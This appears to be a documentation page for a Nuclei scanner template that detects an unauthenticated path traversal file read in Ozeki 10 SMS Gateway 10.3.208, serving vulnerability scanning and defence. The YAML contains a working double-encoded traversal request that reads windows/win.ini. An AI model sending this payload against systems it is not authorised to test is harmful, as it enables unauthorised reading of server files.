Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read
ID: ozeki-10-sms-gateway
Severity: high
Author: r3Y3r53
Tags: ozeki,lfi,unauth
Description
Section titled “Description”An arbitrary file read vulnerability, also known as a “path traversal” or “directory traversal” vulnerability, occurs when an attacker is able to access files on a system that they shouldn’t have access to. This vulnerability arises from improper input validation or insufficient access controls in an application.
YAML Source
Section titled “YAML Source”id: ozeki-10-sms-gateway
info: name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read author: r3Y3r53 severity: high description: | An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application. reference: - https://www.exploit-db.com/exploits/51646 - https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip metadata: verified: true max-request: 1 tags: ozeki,lfi,unauth
http: - method: GET path: - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/octet-stream") && contains(body, "Mail") && contains(body, "files")' condition: and# digest: 4a0a004730450220212b3accd8a556d0ca899178ed4a1ab1e5dc736a735d93bea0f7f8313052bd5a022100d9fa6c68646f83b648b302f83676f6f249185d3b32626517a77decf3edf917c3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/ozeki-10-sms-gateway.yaml"